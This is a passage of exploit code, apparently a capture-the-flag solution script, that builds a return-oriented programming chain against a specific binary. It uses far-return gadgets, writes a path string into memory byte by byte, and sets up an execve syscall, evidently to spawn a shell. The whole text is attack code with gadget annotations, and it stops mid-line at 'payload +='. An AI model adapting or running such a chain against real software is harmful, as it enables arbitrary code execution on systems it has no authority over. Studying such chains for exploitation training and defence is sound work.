payload = p64(0x40803b)
#0x40803b: pop rax ; retf
payload += p64(0x42f1ab)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x8000)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x42f070)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x2f00)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x42f071)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x6200)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x42f072)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x6900)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x42f073)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x6e00)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x42f074)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x2f00)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x42f075)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x6600)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x42f076)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x6800)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x42f077)+p32(0x41e675)+p32(0x33)
# 0x41e675: pop rcx ; retf
payload += p64(0x0)+p32(0x406f8a)+p32(0x33)
# 0x406f8a: add byte ptr [rax], ch ; retf 0
payload += p32(0x40803b)+p32(0x33)
# 0x40803b: pop rax ; retf
payload += p64(0x36b2efc0)+p32(0x401553)+p32(0x33)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x42f070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40803b)
# 0x40803b: pop rax ; retf
payload += p64(0x3b)+p32(0x41397b)+p32(0x33)
# 0x000000000041397b: syscall; ret; 
payload +=
